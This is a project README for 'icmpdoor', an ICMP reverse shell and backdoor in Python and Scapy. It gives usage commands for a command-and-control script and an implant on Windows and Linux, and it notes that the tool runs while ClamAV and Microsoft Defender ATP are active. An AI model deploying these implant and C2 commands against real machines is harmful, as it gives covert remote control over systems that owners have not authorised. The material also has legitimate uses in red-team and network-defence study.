/icmpdoor

ICMP Reverse Shell written in Python 3 and with Scapy (backdoor/rev shell)

Primary LanguagePythonBSD 3-Clause "New" or "Revised" LicenseBSD-3-Clause

icmpdoor - ICMP Reverse Shell

icmpdoor is an ICMP rev shell written in Python3 and scapy. Tested on Ubuntu 20.04, Debian 10 (Kali Linux), and Windows 10.

Read this blog post for more information.

Python version usage (both Windows and Linux):

./icmp-cnc.py -i INTERFACE -d VICTIM-IP (Command and Control)
./icmpdoor.py -i INTERFACE -d CNC-IP (Implant)

Binary Windows version usage version:

./icmp-cnc.exe -d VICTIM-IP (Command and Control)
./icmpdoor.exe -d CNC-IP (Implant)

Binary Linux version usage version:

./icmp-cnc -d VICTIM-IP (Command and Control)
./icmpdoor -d CNC-IP (Implant)

Parameters details:

  -h, --help            show this help message and exit
  -i INTERFACE, --interface INTERFACE
                        Listener (virtual) Network Interface (e.g. eth0)
  -d DESTINATION_IP, --destination_ip DESTINATION_IP
                        Destination IP address
  exit                  Exit Command and Control (E2)

Screenshots

Screenshot 1 and 2 shows how icmpdoor works on Ubuntu 20.04, Debian 10 (Kali Linux) and Windows 10. ClamAV is active on Ubuntu 20.04: screen1 Microsoft Defender Advanced Threat Protection (ATP) is active on the Windows 10 Enterprise machine: screen2

License

Berkeley Software Distribution (BSD)

Author

Jeroen van Kessel | cryptsus.com - we craft cyber security solutions